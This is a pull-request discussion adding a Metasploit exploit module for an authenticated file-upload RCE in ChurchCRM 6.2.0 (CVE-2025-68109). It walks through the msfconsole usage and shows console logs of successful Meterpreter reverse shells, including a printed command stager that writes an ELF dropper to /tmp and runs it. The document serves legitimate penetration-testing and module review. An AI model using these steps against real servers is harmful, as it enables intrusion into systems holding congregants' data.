Adds exploit module for ChurchCRM authenticated RCE (CVE-2025-68109)

[LucasCsmt]

This PR adds a new exploit module for CVE-2025-68109, targeting a file upload vulnerability inside ChurchCRM leading to an RCE. This module will work on version 6.2.0 of ChurchCRM and earlier.

The vulnerability exists within the database restore functionality. Due to lack of input validation, an attacker can inject arbitrary files. Using this vulnerability in order to upload a .htaccess file, an attacker will be able to upload an accessible PHP file that will be interpreted. This metasploit module exploits the vulnerability in order to upload a payload.

Module Details

• Module Path: modules/exploits/multi/http/churchcrm_db_restore_rce.rb
• Documentation: documentation/modules/exploits/multi/http/churchcrm_db_restore_rce.md
• Targets:
  • Linux (Dropper)
  • PHP (In-Memory)
  • PHP (Fetch)
• Vulnerability Type: Authenticated RCE (PHP Injection)

Verification

• Start the vulnerable environment (using Docker instructions provided in the documentation for example).
• Start msfconsole
• use exploit/multi/http/churchcrm_db_restore_rce
• set RHOSTS <TARGET_IP>
• set LHOST <YOUR_IP>
• set target 0 for Linux system
• set target 1 for PHP (In-Memory)
• set target 2 for PHP (Fetch)
• set payload <PAYLOAD>
• set PASSWORD <PASSWORD>
• set USERNAME <USERNAME>
• check
• run
• Verify that a Meterpreter session is successfully opened
• Verify that command execution is possible (id, shell, ...).
• Verify cleanup : check that no temporary payloads remain in /tmp or in /var/www/html/churchcrm/tmp_attach/ChurchCRMBackups.

Scenario

msf > use exploit/multi/http/churchcrm_db_restore_rce
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf exploit(multi/http/churchcrm_db_restore_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf exploit(multi/http/churchcrm_db_restore_rce) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf exploit(multi/http/churchcrm_db_restore_rce) > set target 0
target => 0
msf exploit(multi/http/churchcrm_db_restore_rce) > set PASSWORD 'Password123!'
PASSWORD => Password123!
msf exploit(multi/http/churchcrm_db_restore_rce) > set USERNAME 'admin'
USERNAME => admin
msf exploit(multi/http/churchcrm_db_restore_rce) > show info

       Name: ChurchCRM Database Restore RCE 6.2.0
     Module: exploit/multi/http/churchcrm_db_restore_rce
   Platform: Linux, PHP
       Arch: x86, x64, php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2025-12-17

Provided by:
  LucasCsmt

Module side effects:
 ioc-in-logs
 config-changes

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   Linux/unix Command (CmdStager)
      1   PHP (In-Memory)
      2   PHP (Fetch)

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD   Password123!     yes       Password for the admin account
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
  RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT      80               yes       The target port (TCP)
  SRVSSL     false            no        Negotiate SSL/TLS for local server connections
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  USERNAME   admin            yes       Username for the admin account
  VHOST                       no        HTTP server virtual host


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on a
                                      ll addresses.
  SRVPORT  8080             yes       The local port to listen on.

Payload information:

Description:
  This module exploits a Remote Code Execution (RCE) vulnerability in ChurchCRM
  versions prior to 6.2.0. The vulnerability resides in the Database Restore
  functionality, which allows an authenticated user with administrative privileges
  to upload a malicious backup file. By bypassing upload restrictions via a
  crafted .htaccess file, the module enables PHP code execution in the target
  directory, ultimately providing the attacker with a Meterpreter shell.

References:
  https://github.com/advisories/GHSA-pqm7-g8px-9r77
  https://nvd.nist.gov/vuln/detail/CVE-2025-68109


View the full module info with the info -d command.

msf exploit(multi/http/churchcrm_db_restore_rce) > check
[*] Found ChurchCRM version: 6.2.0
[*] 127.0.0.1:80 - The target appears to be vulnerable. Vulnerable version 6.2.0 detected via CRM-VERSION header.
msf exploit(multi/http/churchcrm_db_restore_rce) > run
[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Getting the session cookie
[+] The session cookie has been received
[*] Uploading the file : .htaccess
[+] The file have been uploaded successfully
[*] Uploading the file : RnYEwCkhr.php
[+] The file have been uploaded successfully
[*] Trying to execute the payload
[*] Command Stager progress -  59.76% done (499/835 bytes)
[*] Sending stage (3090404 bytes) to 172.18.0.2
[+] Deleted .htaccess
[+] Deleted RnYEwCkhr.php
[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:55742) at 2026-03-11 09:26:27 +0100
[*] Command Stager progress - 100.00% done (835/835 bytes)
[+] Payload successfully executed
meterpreter >

References

• https://nvd.nist.gov/vuln/detail/CVE-2025-68109
• GHSA-pqm7-g8px-9r77 (PoC)

[Copilot]

Copilot reviewed 2 out of 2 changed files in this pull request and generated no comments.

[bwatters-r7]

I'm curious why CmdStager is used here?
CmdStager is useful if you don't have access to curl/wget, but if you do have access to curl/wget, fetch payloads are significantly simpler.

[LucasCsmt]

I went with CmdStager for compatibility concerns, aiming to make the module more flexible regardless of the available binaries on the target.

[bwatters-r7]

msf exploit(multi/http/churchcrm_db_restore_rce) > show options

Module options (exploit/multi/http/churchcrm_db_restore_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Password for the admin account
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, socks5h, sapni, http, socks4
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SRVSSL     false            no        Negotiate SSL/TLS for local server connections
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       Username for the admin account
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux/unix Command (CmdStager)



View the full module info with the info, or info -d command.

msf exploit(multi/http/churchcrm_db_restore_rce) > set verbose true
verbose => true
msf exploit(multi/http/churchcrm_db_restore_rce) > set rhost 10.5.134.167
rhost => 10.5.134.167
msf exploit(multi/http/churchcrm_db_restore_rce) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf exploit(multi/http/churchcrm_db_restore_rce) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf exploit(multi/http/churchcrm_db_restore_rce) > run
[-] Msf::OptionValidateError One or more options failed to validate: PASSWORD.
msf exploit(multi/http/churchcrm_db_restore_rce) > set password v3Mpassword
password => v3Mpassword
msf exploit(multi/http/churchcrm_db_restore_rce) > run
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Getting the session cookie
[-] The connection was refused by the remote host (10.5.134.167:80).
[-] Exploit aborted due to failure: unreachable: No answer from the server
[*] Exploit completed, but no session was created.
msf exploit(multi/http/churchcrm_db_restore_rce) > run
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Getting the session cookie
[+] The session cookie has been received
[*] Uploading the file : .htaccess
[+] The file have been uploaded successfully
[*] Uploading the file : QCiwIOFO.php
[+] The file have been uploaded successfully
[*] Trying to execute the payload
[*] Generated command stager: ["printf '\\177\\105\\114\\106\\2\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\76\\0\\1\\0\\0\\0\\170\\0\\100\\0\\0\\0\\0\\0\\100\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\100\\0\\70\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\7\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\100\\0\\0\\0\\0\\0\\0\\0\\100\\0\\0\\0\\0\\0\\372\\0\\0\\0\\0\\0\\0\\0\\174\\1\\0\\0\\0\\0\\0\\0\\0\\20\\0\\0\\0\\0\\0\\0\\61\\377\\152\\11\\130\\231\\266\\20\\110\\211\\326\\115\\61\\311\\152\\42\\101\\132\\152\\7\\132\\17\\5\\110\\205\\300\\170\\121\\152\\12\\101\\131\\120\\152\\51\\130\\231\\152\\2\\137\\152\\1\\136\\17\\5\\110\\205\\300\\170\\73\\110\\227\\110\\271\\2\\0\\21\\134\\12\\5'>>/tmp/qtWnr", "printf '\\207\\311\\121\\110\\211\\346\\152\\20\\132\\152\\52\\130\\17\\5\\131\\110\\205\\300\\171\\45\\111\\377\\311\\164\\30\\127\\152\\43\\130\\152\\0\\152\\5\\110\\211\\347\\110\\61\\366\\17\\5\\131\\131\\137\\110\\205\\300\\171\\307\\152\\74\\130\\152\\1\\137\\17\\5\\136\\152\\176\\132\\17\\5\\110\\205\\300\\170\\355\\377\\346'>>/tmp/qtWnr ; chmod +x /tmp/qtWnr ; /tmp/qtWnr & echo ; rm -f /tmp/qtWnr"]
[*] Command Stager progress -  59.74% done (500/837 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 10.5.134.167
[+] Deleted .htaccess
[+] Deleted QCiwIOFO.php
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.167:38250) at 2026-04-09 17:53:14 -0500

[*] Command Stager progress - 100.00% done (837/837 bytes)
[+] Payload successfully executed

meterpreter > 
meterpreter > sysinfo
Computer     : 8e1fe9f8dbe9
OS           : Ubuntu 22.04 (Linux 6.8.0-79-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data

[bwatters-r7]

Release Notes

Adds a new exploit module for CVE-2025-68109, targeting a file upload vulnerability inside ChurchCRM leading to an RCE. This module will work on version 6.2.0 of ChurchCRM and earlier.